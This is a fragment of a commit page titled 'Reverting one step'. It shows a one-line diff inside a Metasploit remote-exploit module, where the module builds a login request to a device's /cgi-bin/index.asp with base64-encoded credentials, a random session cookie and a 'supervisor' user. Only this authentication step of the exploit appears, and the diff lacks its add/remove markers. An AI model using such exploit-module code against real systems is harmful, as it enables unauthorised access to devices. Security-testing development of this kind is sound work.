Reverting one step

bug/bundler_fix
itsmeroy2012 2017-03-13 22:22:24 +05:30
parent 1c54e0ba94
commit fe4e2306b4
1 changed files with 1 additions and 1 deletions

View File

@ -98,8 +98,8 @@ class MetasploitModule < Msf::Exploit::Remote
@cookie = rand_text_alpha_lower(7)
res = send_request_cgi({
'method' => "GET",
'uri' => '/cgi-bin/index.asp?' + Rex::Text.encode_base64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}"),
'method' => 'POST',
'cookie' => "SESSIONID=#{@cookie}",
'vars_post' => {
'Loginuser' => 'supervisor',